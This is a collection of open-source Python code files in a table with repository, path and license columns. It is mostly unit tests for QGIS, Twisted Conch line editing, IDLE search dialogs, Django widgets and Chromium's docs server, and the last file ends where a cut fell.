| code | repo_name | path | language | license | size |
|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsDefaultValue.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = 'Matthias Kuhn'
__date__ = '26.9.2017'
__copyright__ = 'Copyright 2017, The QGIS Project'
import qgis # NOQA
from qgis.core import (QgsDefaultValue)
from qgis.testing import unittest
class TestQgsDefaultValue(unittest.TestCase):
def testValid(self):
self.assertFalse(QgsDefaultValue())
self.assertTrue(QgsDefaultValue('test'))
self.assertTrue(QgsDefaultValue('abc', True))
self.assertTrue(QgsDefaultValue('abc', False))
    def testSetGetExpression(self):
value = QgsDefaultValue('abc', False)
self.assertEqual(value.expression(), 'abc')
value.setExpression('def')
self.assertEqual(value.expression(), 'def')
    def testSetGetApplyOnUpdate(self):
value = QgsDefaultValue('abc', False)
self.assertEqual(value.applyOnUpdate(), False)
value.setApplyOnUpdate(True)
self.assertEqual(value.applyOnUpdate(), True)
if __name__ == '__main__':
unittest.main()
|
pblottiere/QGIS
|
tests/src/python/test_qgsdefaultvalue.py
|
Python
|
gpl-2.0
| 1,300
|
"""Tests for the HomematicIP Cloud component."""
|
fbradyirl/home-assistant
|
tests/components/homematicip_cloud/__init__.py
|
Python
|
apache-2.0
| 49
|
# Copyright (c) 2015 Cloudbase Solutions.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import eventlet
def monkey_patch():
if os.name == 'nt':
# eventlet monkey patching the os and thread modules causes
# subprocess.Popen to fail on Windows when using pipes due
# to missing non-blocking IO support.
#
# bug report on eventlet:
# https://bitbucket.org/eventlet/eventlet/issue/132/
# eventletmonkey_patch-breaks
eventlet.monkey_patch(os=False, thread=False)
else:
eventlet.monkey_patch()
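# Usage sketch (a hypothetical entry point, not part of this module): call
# monkey_patch() once, before importing anything that uses subprocess pipes,
# so the right primitives are in place on every platform:
#
#     from neutron.common import eventlet_utils
#     eventlet_utils.monkey_patch()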
|
Stavitsky/neutron
|
neutron/common/eventlet_utils.py
|
Python
|
apache-2.0
| 1,112
|
# $Id: 201_ice_mismatch_1.py 2392 2008-12-22 18:54:58Z bennylp $
import inc_sip as sip
import inc_sdp as sdp
sdp = \
"""
v=0
o=- 0 0 IN IP4 127.0.0.1
s=pjmedia
c=IN IP4 127.0.0.1
t=0 0
m=audio 4000 RTP/AVP 0 101
a=ice-ufrag:1234
a=ice-pwd:5678
a=rtpmap:0 PCMU/8000
a=sendrecv
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-15
a=candidate:XX 1 UDP 1 1.1.1.1 2222 typ host
"""
args = "--null-audio --use-ice --auto-answer 200 --max-calls 1"
include = ["a=ice-mismatch"]
exclude = []
sendto_cfg = sip.SendtoCfg( "caller sends mismatched offer for comp 1",
pjsua_args=args, sdp=sdp, resp_code=200,
resp_inc=include, resp_exc=exclude)
|
lxki/pjsip
|
tests/pjsua/scripts-sendto/201_ice_mismatch_1.py
|
Python
|
gpl-2.0
| 650
|
# -*- test-case-name: twisted.conch.test.test_recvline -*-
# Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for L{twisted.conch.recvline} and fixtures for testing related
functionality.
"""
import sys, os
from twisted.conch.insults import insults
from twisted.conch import recvline
from twisted.python import reflect, components
from twisted.internet import defer, error
from twisted.trial import unittest
from twisted.cred import portal
from twisted.test.proto_helpers import StringTransport
class Arrows(unittest.TestCase):
def setUp(self):
self.underlyingTransport = StringTransport()
self.pt = insults.ServerProtocol()
self.p = recvline.HistoricRecvLine()
self.pt.protocolFactory = lambda: self.p
self.pt.factory = self
self.pt.makeConnection(self.underlyingTransport)
# self.p.makeConnection(self.pt)
def testPrintableCharacters(self):
self.p.keystrokeReceived('x', None)
self.p.keystrokeReceived('y', None)
self.p.keystrokeReceived('z', None)
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
def testHorizontalArrows(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'xyz':
kR(ch)
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
kR(self.pt.RIGHT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
kR(self.pt.LEFT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('xy', 'z'))
kR(self.pt.LEFT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('x', 'yz'))
kR(self.pt.LEFT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('', 'xyz'))
kR(self.pt.LEFT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('', 'xyz'))
kR(self.pt.RIGHT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('x', 'yz'))
kR(self.pt.RIGHT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('xy', 'z'))
kR(self.pt.RIGHT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
kR(self.pt.RIGHT_ARROW)
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
def testNewline(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'xyz\nabc\n123\n':
kR(ch)
self.assertEquals(self.p.currentHistoryBuffer(),
(('xyz', 'abc', '123'), ()))
kR('c')
kR('b')
kR('a')
self.assertEquals(self.p.currentHistoryBuffer(),
(('xyz', 'abc', '123'), ()))
kR('\n')
self.assertEquals(self.p.currentHistoryBuffer(),
(('xyz', 'abc', '123', 'cba'), ()))
def testVerticalArrows(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'xyz\nabc\n123\n':
kR(ch)
self.assertEquals(self.p.currentHistoryBuffer(),
(('xyz', 'abc', '123'), ()))
self.assertEquals(self.p.currentLineBuffer(), ('', ''))
kR(self.pt.UP_ARROW)
self.assertEquals(self.p.currentHistoryBuffer(),
(('xyz', 'abc'), ('123',)))
self.assertEquals(self.p.currentLineBuffer(), ('123', ''))
kR(self.pt.UP_ARROW)
self.assertEquals(self.p.currentHistoryBuffer(),
(('xyz',), ('abc', '123')))
self.assertEquals(self.p.currentLineBuffer(), ('abc', ''))
kR(self.pt.UP_ARROW)
self.assertEquals(self.p.currentHistoryBuffer(),
((), ('xyz', 'abc', '123')))
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
kR(self.pt.UP_ARROW)
self.assertEquals(self.p.currentHistoryBuffer(),
((), ('xyz', 'abc', '123')))
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
for i in range(4):
kR(self.pt.DOWN_ARROW)
self.assertEquals(self.p.currentHistoryBuffer(),
(('xyz', 'abc', '123'), ()))
def testHome(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'hello, world':
kR(ch)
self.assertEquals(self.p.currentLineBuffer(), ('hello, world', ''))
kR(self.pt.HOME)
self.assertEquals(self.p.currentLineBuffer(), ('', 'hello, world'))
def testEnd(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'hello, world':
kR(ch)
self.assertEquals(self.p.currentLineBuffer(), ('hello, world', ''))
kR(self.pt.HOME)
kR(self.pt.END)
self.assertEquals(self.p.currentLineBuffer(), ('hello, world', ''))
def testBackspace(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'xyz':
kR(ch)
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
kR(self.pt.BACKSPACE)
self.assertEquals(self.p.currentLineBuffer(), ('xy', ''))
kR(self.pt.LEFT_ARROW)
kR(self.pt.BACKSPACE)
self.assertEquals(self.p.currentLineBuffer(), ('', 'y'))
kR(self.pt.BACKSPACE)
self.assertEquals(self.p.currentLineBuffer(), ('', 'y'))
def testDelete(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'xyz':
kR(ch)
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
kR(self.pt.DELETE)
self.assertEquals(self.p.currentLineBuffer(), ('xyz', ''))
kR(self.pt.LEFT_ARROW)
kR(self.pt.DELETE)
self.assertEquals(self.p.currentLineBuffer(), ('xy', ''))
kR(self.pt.LEFT_ARROW)
kR(self.pt.DELETE)
self.assertEquals(self.p.currentLineBuffer(), ('x', ''))
kR(self.pt.LEFT_ARROW)
kR(self.pt.DELETE)
self.assertEquals(self.p.currentLineBuffer(), ('', ''))
kR(self.pt.DELETE)
self.assertEquals(self.p.currentLineBuffer(), ('', ''))
def testInsert(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'xyz':
kR(ch)
# kR(self.pt.INSERT)
kR(self.pt.LEFT_ARROW)
kR('A')
self.assertEquals(self.p.currentLineBuffer(), ('xyA', 'z'))
kR(self.pt.LEFT_ARROW)
kR('B')
self.assertEquals(self.p.currentLineBuffer(), ('xyB', 'Az'))
def testTypeover(self):
kR = lambda ch: self.p.keystrokeReceived(ch, None)
for ch in 'xyz':
kR(ch)
kR(self.pt.INSERT)
kR(self.pt.LEFT_ARROW)
kR('A')
self.assertEquals(self.p.currentLineBuffer(), ('xyA', ''))
kR(self.pt.LEFT_ARROW)
kR('B')
self.assertEquals(self.p.currentLineBuffer(), ('xyB', ''))
from twisted.conch import telnet
from twisted.conch.insults import helper
from twisted.protocols import loopback
class EchoServer(recvline.HistoricRecvLine):
def lineReceived(self, line):
self.terminal.write(line + '\n' + self.ps[self.pn])
# An insults API for this would be nice.
left = "\x1b[D"
right = "\x1b[C"
up = "\x1b[A"
down = "\x1b[B"
insert = "\x1b[2~"
home = "\x1b[1~"
delete = "\x1b[3~"
end = "\x1b[4~"
backspace = "\x7f"
from twisted.cred import checkers
try:
from twisted.conch.ssh import userauth, transport, channel, connection, session
from twisted.conch.manhole_ssh import TerminalUser, TerminalSession, TerminalRealm, TerminalSessionTransport, ConchFactory
except ImportError:
ssh = False
else:
ssh = True
class SessionChannel(channel.SSHChannel):
name = 'session'
def __init__(self, protocolFactory, protocolArgs, protocolKwArgs, width, height, *a, **kw):
channel.SSHChannel.__init__(self, *a, **kw)
self.protocolFactory = protocolFactory
self.protocolArgs = protocolArgs
self.protocolKwArgs = protocolKwArgs
self.width = width
self.height = height
def channelOpen(self, data):
term = session.packRequest_pty_req("vt102", (self.height, self.width, 0, 0), '')
self.conn.sendRequest(self, 'pty-req', term)
self.conn.sendRequest(self, 'shell', '')
self._protocolInstance = self.protocolFactory(*self.protocolArgs, **self.protocolKwArgs)
self._protocolInstance.factory = self
self._protocolInstance.makeConnection(self)
def closed(self):
self._protocolInstance.connectionLost(error.ConnectionDone())
def dataReceived(self, data):
self._protocolInstance.dataReceived(data)
class TestConnection(connection.SSHConnection):
def __init__(self, protocolFactory, protocolArgs, protocolKwArgs, width, height, *a, **kw):
connection.SSHConnection.__init__(self, *a, **kw)
self.protocolFactory = protocolFactory
self.protocolArgs = protocolArgs
self.protocolKwArgs = protocolKwArgs
self.width = width
self.height = height
def serviceStarted(self):
self.__channel = SessionChannel(self.protocolFactory, self.protocolArgs, self.protocolKwArgs, self.width, self.height)
self.openChannel(self.__channel)
def write(self, bytes):
return self.__channel.write(bytes)
class TestAuth(userauth.SSHUserAuthClient):
def __init__(self, username, password, *a, **kw):
userauth.SSHUserAuthClient.__init__(self, username, *a, **kw)
self.password = password
def getPassword(self):
return defer.succeed(self.password)
class TestTransport(transport.SSHClientTransport):
def __init__(self, protocolFactory, protocolArgs, protocolKwArgs, username, password, width, height, *a, **kw):
# transport.SSHClientTransport.__init__(self, *a, **kw)
self.protocolFactory = protocolFactory
self.protocolArgs = protocolArgs
self.protocolKwArgs = protocolKwArgs
self.username = username
self.password = password
self.width = width
self.height = height
def verifyHostKey(self, hostKey, fingerprint):
return defer.succeed(True)
def connectionSecure(self):
self.__connection = TestConnection(self.protocolFactory, self.protocolArgs, self.protocolKwArgs, self.width, self.height)
self.requestService(
TestAuth(self.username, self.password, self.__connection))
def write(self, bytes):
return self.__connection.write(bytes)
class TestSessionTransport(TerminalSessionTransport):
def protocolFactory(self):
return self.avatar.conn.transport.factory.serverProtocol()
class TestSession(TerminalSession):
transportFactory = TestSessionTransport
class TestUser(TerminalUser):
pass
components.registerAdapter(TestSession, TestUser, session.ISession)
class LoopbackRelay(loopback.LoopbackRelay):
clearCall = None
def logPrefix(self):
return "LoopbackRelay(%r)" % (self.target.__class__.__name__,)
def write(self, bytes):
loopback.LoopbackRelay.write(self, bytes)
if self.clearCall is not None:
self.clearCall.cancel()
from twisted.internet import reactor
self.clearCall = reactor.callLater(0, self._clearBuffer)
def _clearBuffer(self):
self.clearCall = None
loopback.LoopbackRelay.clearBuffer(self)
class NotifyingExpectableBuffer(helper.ExpectableBuffer):
def __init__(self):
self.onConnection = defer.Deferred()
self.onDisconnection = defer.Deferred()
def connectionMade(self):
helper.ExpectableBuffer.connectionMade(self)
self.onConnection.callback(self)
def connectionLost(self, reason):
self.onDisconnection.errback(reason)
class _BaseMixin:
WIDTH = 80
HEIGHT = 24
def _assertBuffer(self, lines):
receivedLines = str(self.recvlineClient).splitlines()
expectedLines = lines + ([''] * (self.HEIGHT - len(lines) - 1))
self.assertEquals(len(receivedLines), len(expectedLines))
for i in range(len(receivedLines)):
self.assertEquals(
receivedLines[i], expectedLines[i],
str(receivedLines[max(0, i-1):i+1]) +
" != " +
str(expectedLines[max(0, i-1):i+1]))
def _trivialTest(self, input, output):
done = self.recvlineClient.expect("done")
self._testwrite(input)
def finished(ign):
self._assertBuffer(output)
return done.addCallback(finished)
class _SSHMixin(_BaseMixin):
def setUp(self):
if not ssh:
raise unittest.SkipTest("Crypto requirements missing, can't run historic recvline tests over ssh")
u, p = 'testuser', 'testpass'
rlm = TerminalRealm()
rlm.userFactory = TestUser
rlm.chainedProtocolFactory = lambda: insultsServer
ptl = portal.Portal(
rlm,
[checkers.InMemoryUsernamePasswordDatabaseDontUse(**{u: p})])
sshFactory = ConchFactory(ptl)
sshFactory.serverProtocol = self.serverProtocol
sshFactory.startFactory()
recvlineServer = self.serverProtocol()
insultsServer = insults.ServerProtocol(lambda: recvlineServer)
sshServer = sshFactory.buildProtocol(None)
clientTransport = LoopbackRelay(sshServer)
recvlineClient = NotifyingExpectableBuffer()
insultsClient = insults.ClientProtocol(lambda: recvlineClient)
sshClient = TestTransport(lambda: insultsClient, (), {}, u, p, self.WIDTH, self.HEIGHT)
serverTransport = LoopbackRelay(sshClient)
sshClient.makeConnection(clientTransport)
sshServer.makeConnection(serverTransport)
self.recvlineClient = recvlineClient
self.sshClient = sshClient
self.sshServer = sshServer
self.clientTransport = clientTransport
self.serverTransport = serverTransport
return recvlineClient.onConnection
def _testwrite(self, bytes):
self.sshClient.write(bytes)
from twisted.conch.test import test_telnet
class TestInsultsClientProtocol(insults.ClientProtocol,
test_telnet.TestProtocol):
pass
class TestInsultsServerProtocol(insults.ServerProtocol,
test_telnet.TestProtocol):
pass
class _TelnetMixin(_BaseMixin):
def setUp(self):
recvlineServer = self.serverProtocol()
insultsServer = TestInsultsServerProtocol(lambda: recvlineServer)
telnetServer = telnet.TelnetTransport(lambda: insultsServer)
clientTransport = LoopbackRelay(telnetServer)
recvlineClient = NotifyingExpectableBuffer()
insultsClient = TestInsultsClientProtocol(lambda: recvlineClient)
telnetClient = telnet.TelnetTransport(lambda: insultsClient)
serverTransport = LoopbackRelay(telnetClient)
telnetClient.makeConnection(clientTransport)
telnetServer.makeConnection(serverTransport)
serverTransport.clearBuffer()
clientTransport.clearBuffer()
self.recvlineClient = recvlineClient
self.telnetClient = telnetClient
self.clientTransport = clientTransport
self.serverTransport = serverTransport
return recvlineClient.onConnection
def _testwrite(self, bytes):
self.telnetClient.write(bytes)
try:
from twisted.conch import stdio
except ImportError:
stdio = None
class _StdioMixin(_BaseMixin):
def setUp(self):
# A memory-only terminal emulator, into which the server will
# write things and make other state changes. What ends up
# here is basically what a user would have seen on their
# screen.
testTerminal = NotifyingExpectableBuffer()
# An insults client protocol which will translate bytes
# received from the child process into keystroke commands for
# an ITerminalProtocol.
insultsClient = insults.ClientProtocol(lambda: testTerminal)
# A process protocol which will translate stdout and stderr
# received from the child process to dataReceived calls and
# error reporting on an insults client protocol.
processClient = stdio.TerminalProcessProtocol(insultsClient)
# Run twisted/conch/stdio.py with the name of a class
# implementing ITerminalProtocol. This class will be used to
# handle bytes we send to the child process.
exe = sys.executable
module = stdio.__file__
if module.endswith('.pyc') or module.endswith('.pyo'):
module = module[:-1]
args = [exe, module, reflect.qual(self.serverProtocol)]
env = os.environ.copy()
env["PYTHONPATH"] = os.pathsep.join(sys.path)
from twisted.internet import reactor
clientTransport = reactor.spawnProcess(processClient, exe, args,
env=env, usePTY=True)
self.recvlineClient = self.testTerminal = testTerminal
self.processClient = processClient
self.clientTransport = clientTransport
# Wait for the process protocol and test terminal to become
# connected before proceeding. The former should always
# happen first, but it doesn't hurt to be safe.
return defer.gatherResults(filter(None, [
processClient.onConnection,
testTerminal.expect(">>> ")]))
def tearDown(self):
# Kill the child process. We're done with it.
try:
self.clientTransport.signalProcess("KILL")
except (error.ProcessExitedAlready, OSError):
pass
def trap(failure):
failure.trap(error.ProcessTerminated)
self.assertEquals(failure.value.exitCode, None)
self.assertEquals(failure.value.status, 9)
return self.testTerminal.onDisconnection.addErrback(trap)
def _testwrite(self, bytes):
self.clientTransport.write(bytes)
class RecvlineLoopbackMixin:
serverProtocol = EchoServer
def testSimple(self):
return self._trivialTest(
"first line\ndone",
[">>> first line",
"first line",
">>> done"])
def testLeftArrow(self):
return self._trivialTest(
insert + 'first line' + left * 4 + "xxxx\ndone",
[">>> first xxxx",
"first xxxx",
">>> done"])
def testRightArrow(self):
return self._trivialTest(
insert + 'right line' + left * 4 + right * 2 + "xx\ndone",
[">>> right lixx",
"right lixx",
">>> done"])
def testBackspace(self):
return self._trivialTest(
"second line" + backspace * 4 + "xxxx\ndone",
[">>> second xxxx",
"second xxxx",
">>> done"])
def testDelete(self):
return self._trivialTest(
"delete xxxx" + left * 4 + delete * 4 + "line\ndone",
[">>> delete line",
"delete line",
">>> done"])
def testInsert(self):
return self._trivialTest(
"third ine" + left * 3 + "l\ndone",
[">>> third line",
"third line",
">>> done"])
def testTypeover(self):
return self._trivialTest(
"fourth xine" + left * 4 + insert + "l\ndone",
[">>> fourth line",
"fourth line",
">>> done"])
def testHome(self):
return self._trivialTest(
insert + "blah line" + home + "home\ndone",
[">>> home line",
"home line",
">>> done"])
def testEnd(self):
return self._trivialTest(
"end " + left * 4 + end + "line\ndone",
[">>> end line",
"end line",
">>> done"])
class RecvlineLoopbackTelnet(_TelnetMixin, unittest.TestCase, RecvlineLoopbackMixin):
pass
class RecvlineLoopbackSSH(_SSHMixin, unittest.TestCase, RecvlineLoopbackMixin):
pass
class RecvlineLoopbackStdio(_StdioMixin, unittest.TestCase, RecvlineLoopbackMixin):
if stdio is None:
skip = "Terminal requirements missing, can't run recvline tests over stdio"
class HistoricRecvlineLoopbackMixin:
serverProtocol = EchoServer
def testUpArrow(self):
return self._trivialTest(
"first line\n" + up + "\ndone",
[">>> first line",
"first line",
">>> first line",
"first line",
">>> done"])
def testDownArrow(self):
return self._trivialTest(
"first line\nsecond line\n" + up * 2 + down + "\ndone",
[">>> first line",
"first line",
">>> second line",
"second line",
">>> second line",
"second line",
">>> done"])
class HistoricRecvlineLoopbackTelnet(_TelnetMixin, unittest.TestCase, HistoricRecvlineLoopbackMixin):
pass
class HistoricRecvlineLoopbackSSH(_SSHMixin, unittest.TestCase, HistoricRecvlineLoopbackMixin):
pass
class HistoricRecvlineLoopbackStdio(_StdioMixin, unittest.TestCase, HistoricRecvlineLoopbackMixin):
if stdio is None:
skip = "Terminal requirements missing, can't run historic recvline tests over stdio"
|
sorenh/cc
|
vendor/Twisted-10.0.0/twisted/conch/test/test_recvline.py
|
Python
|
apache-2.0
| 21,585
|
'''Unittests for idlelib/SearchDialogBase.py
Coverage: 99%. The only thing not covered is inconsequential --
testing skipping of suite when self.needwrapbutton is false.
'''
import unittest
from test.support import requires
from tkinter import Tk, Toplevel, Frame, Label, BooleanVar, StringVar
from idlelib import SearchEngine as se
from idlelib import SearchDialogBase as sdb
from idlelib.idle_test.mock_idle import Func
from idlelib.idle_test.mock_tk import Var, Mbox
# The following could help make some tests gui-free.
# However, they currently make radiobutton tests fail.
##def setUpModule():
## # Replace tk objects used to initialize se.SearchEngine.
## se.BooleanVar = Var
## se.StringVar = Var
##
##def tearDownModule():
## se.BooleanVar = BooleanVar
## se.StringVar = StringVar
class SearchDialogBaseTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
requires('gui')
cls.root = Tk()
@classmethod
def tearDownClass(cls):
cls.root.destroy()
del cls.root
def setUp(self):
self.engine = se.SearchEngine(self.root) # None also seems to work
self.dialog = sdb.SearchDialogBase(root=self.root, engine=self.engine)
def tearDown(self):
self.dialog.close()
def test_open_and_close(self):
# open calls create_widgets, which needs default_command
self.dialog.default_command = None
# Since text parameter of .open is not used in base class,
# pass dummy 'text' instead of tk.Text().
self.dialog.open('text')
self.assertEqual(self.dialog.top.state(), 'normal')
self.dialog.close()
self.assertEqual(self.dialog.top.state(), 'withdrawn')
self.dialog.open('text', searchphrase="hello")
self.assertEqual(self.dialog.ent.get(), 'hello')
self.dialog.close()
def test_create_widgets(self):
self.dialog.create_entries = Func()
self.dialog.create_option_buttons = Func()
self.dialog.create_other_buttons = Func()
self.dialog.create_command_buttons = Func()
self.dialog.default_command = None
self.dialog.create_widgets()
self.assertTrue(self.dialog.create_entries.called)
self.assertTrue(self.dialog.create_option_buttons.called)
self.assertTrue(self.dialog.create_other_buttons.called)
self.assertTrue(self.dialog.create_command_buttons.called)
def test_make_entry(self):
equal = self.assertEqual
self.dialog.row = 0
self.dialog.top = Toplevel(self.root)
entry, label = self.dialog.make_entry("Test:", 'hello')
equal(label['text'], 'Test:')
self.assertIn(entry.get(), 'hello')
egi = entry.grid_info()
equal(int(egi['row']), 0)
equal(int(egi['column']), 1)
equal(int(egi['rowspan']), 1)
equal(int(egi['columnspan']), 1)
equal(self.dialog.row, 1)
def test_create_entries(self):
self.dialog.row = 0
self.engine.setpat('hello')
self.dialog.create_entries()
self.assertIn(self.dialog.ent.get(), 'hello')
def test_make_frame(self):
self.dialog.row = 0
self.dialog.top = Toplevel(self.root)
frame, label = self.dialog.make_frame()
self.assertEqual(label, '')
self.assertIsInstance(frame, Frame)
frame, label = self.dialog.make_frame('testlabel')
self.assertEqual(label['text'], 'testlabel')
self.assertIsInstance(frame, Frame)
def btn_test_setup(self, meth):
self.dialog.top = Toplevel(self.root)
self.dialog.row = 0
return meth()
def test_create_option_buttons(self):
e = self.engine
for state in (0, 1):
for var in (e.revar, e.casevar, e.wordvar, e.wrapvar):
var.set(state)
frame, options = self.btn_test_setup(
self.dialog.create_option_buttons)
            for spec, button in zip(options, frame.pack_slaves()):
var, label = spec
self.assertEqual(button['text'], label)
self.assertEqual(var.get(), state)
if state == 1:
button.deselect()
else:
button.select()
self.assertEqual(var.get(), 1 - state)
def test_create_other_buttons(self):
for state in (False, True):
var = self.engine.backvar
var.set(state)
frame, others = self.btn_test_setup(
self.dialog.create_other_buttons)
buttons = frame.pack_slaves()
for spec, button in zip(others, buttons):
val, label = spec
self.assertEqual(button['text'], label)
if val == state:
# hit other button, then this one
# indexes depend on button order
self.assertEqual(var.get(), state)
buttons[val].select()
self.assertEqual(var.get(), 1 - state)
buttons[1-val].select()
self.assertEqual(var.get(), state)
def test_make_button(self):
self.dialog.top = Toplevel(self.root)
self.dialog.buttonframe = Frame(self.dialog.top)
btn = self.dialog.make_button('Test', self.dialog.close)
self.assertEqual(btn['text'], 'Test')
def test_create_command_buttons(self):
self.dialog.create_command_buttons()
# Look for close button command in buttonframe
closebuttoncommand = ''
for child in self.dialog.buttonframe.winfo_children():
if child['text'] == 'close':
closebuttoncommand = child['command']
self.assertIn('close', closebuttoncommand)
if __name__ == '__main__':
unittest.main(verbosity=2, exit=2)
|
FireWRT/OpenWrt-Firefly-Libraries
|
staging_dir/target-mipsel_1004kc+dsp_uClibc-0.9.33.2/usr/lib/python3.4/idlelib/idle_test/test_searchdialogbase.py
|
Python
|
gpl-2.0
| 5,860
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'core'
}
DOCUMENTATION = '''
---
author: Ansible Core Team (@ansible)
module: import_tasks
short_description: Import a task list
description:
- Imports a list of tasks to be added to the current playbook for subsequent execution.
version_added: "2.4"
options:
free-form:
description:
- The name of the imported file is specified directly without any other option.
- Most keywords, including loops and conditionals, apply only to the imported tasks, not to this statement
itself. If you need any of those to apply, use M(include_tasks) instead.
notes:
- This is a core feature of Ansible, rather than a module, and cannot be overridden like a module.
'''
EXAMPLES = """
- hosts: all
tasks:
- debug:
msg: task1
- name: Include task list in play
import_tasks: stuff.yaml
- debug:
msg: task10
- hosts: all
tasks:
- debug:
msg: task1
- name: Apply conditional to all imported tasks
import_tasks: stuff.yaml
when: hostvar is defined
"""
RETURN = """
# This module does not return anything except tasks to execute.
"""
|
hryamzik/ansible
|
lib/ansible/modules/utilities/logic/import_tasks.py
|
Python
|
gpl-3.0
| 1,471
|
from django.forms import HiddenInput
from .base import WidgetTest
class HiddenInputTest(WidgetTest):
widget = HiddenInput()
def test_render(self):
self.check_html(self.widget, 'email', '', html='<input type="hidden" name="email" />')
def test_use_required_attribute(self):
# Always False to avoid browser validation on inputs hidden from the
# user.
self.assertIs(self.widget.use_required_attribute(None), False)
self.assertIs(self.widget.use_required_attribute(''), False)
self.assertIs(self.widget.use_required_attribute('foo'), False)
|
edmorley/django
|
tests/forms_tests/widget_tests/test_hiddeninput.py
|
Python
|
bsd-3-clause
| 603
|
#!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from copy import deepcopy
import unittest
from host_file_system_provider import HostFileSystemProvider
from host_file_system_iterator import HostFileSystemIterator
from object_store_creator import ObjectStoreCreator
from test_branch_utility import TestBranchUtility
from test_data.canned_data import CANNED_API_FILE_SYSTEM_DATA
from test_file_system import TestFileSystem
def _GetIterationTracker(version):
'''Adds the ChannelInfo object from each iteration to a list, and signals the
loop to stop when |version| is reached.
'''
iterations = []
def callback(file_system, channel_info):
if channel_info.version == version:
return False
iterations.append(channel_info)
return True
return (iterations, callback)
class HostFileSystemIteratorTest(unittest.TestCase):
def setUp(self):
def host_file_system_constructor(branch, **optargs):
return TestFileSystem(deepcopy(CANNED_API_FILE_SYSTEM_DATA[branch]))
host_file_system_provider = HostFileSystemProvider(
ObjectStoreCreator.ForTest(),
constructor_for_test=host_file_system_constructor)
self._branch_utility = TestBranchUtility.CreateWithCannedData()
self._iterator = HostFileSystemIterator(
host_file_system_provider,
self._branch_utility)
  def _GetStableChannelInfo(self, version):
return self._branch_utility.GetStableChannelInfo(version)
def _GetChannelInfo(self, channel_name):
return self._branch_utility.GetChannelInfo(channel_name)
def testAscending(self):
# Start at |stable| version 5, and move up towards |master|.
# Total: 28 file systems.
iterations, callback = _GetIterationTracker(0)
self.assertEqual(
self._iterator.Ascending(self._GetStableChannelInfo(5), callback),
self._GetChannelInfo('master'))
self.assertEqual(len(iterations), 28)
# Start at |stable| version 5, and move up towards |master|. The callback
# fails at |beta|, so the last successful callback was the latest version
# of |stable|. Total: 25 file systems.
iterations, callback = _GetIterationTracker(
self._GetChannelInfo('beta').version)
self.assertEqual(
self._iterator.Ascending(self._GetStableChannelInfo(5), callback),
self._GetChannelInfo('stable'))
self.assertEqual(len(iterations), 25)
# Start at |stable| version 5, and the callback fails immediately. Since
# no file systems are successfully processed, expect a return of None.
iterations, callback = _GetIterationTracker(5)
self.assertEqual(
self._iterator.Ascending(self._GetStableChannelInfo(5), callback),
None)
self.assertEqual([], iterations)
# Start at |stable| version 5, and the callback fails at version 6.
# The return should represent |stable| version 5.
iterations, callback = _GetIterationTracker(6)
self.assertEqual(
self._iterator.Ascending(self._GetStableChannelInfo(5), callback),
self._GetStableChannelInfo(5))
self.assertEqual([self._GetStableChannelInfo(5)], iterations)
# Start at the latest version of |stable|, and the callback fails at
# |master|. Total: 3 file systems.
iterations, callback = _GetIterationTracker('master')
self.assertEqual(
self._iterator.Ascending(self._GetChannelInfo('stable'), callback),
self._GetChannelInfo('dev'))
self.assertEqual([self._GetChannelInfo('stable'),
self._GetChannelInfo('beta'),
self._GetChannelInfo('dev')], iterations)
# Start at |stable| version 10, and the callback fails at |master|.
iterations, callback = _GetIterationTracker('master')
self.assertEqual(
self._iterator.Ascending(self._GetStableChannelInfo(10), callback),
self._GetChannelInfo('dev'))
self.assertEqual([self._GetStableChannelInfo(10),
self._GetStableChannelInfo(11),
self._GetStableChannelInfo(12),
self._GetStableChannelInfo(13),
self._GetStableChannelInfo(14),
self._GetStableChannelInfo(15),
self._GetStableChannelInfo(16),
self._GetStableChannelInfo(17),
self._GetStableChannelInfo(18),
self._GetStableChannelInfo(19),
self._GetStableChannelInfo(20),
self._GetStableChannelInfo(21),
self._GetStableChannelInfo(22),
self._GetStableChannelInfo(23),
self._GetStableChannelInfo(24),
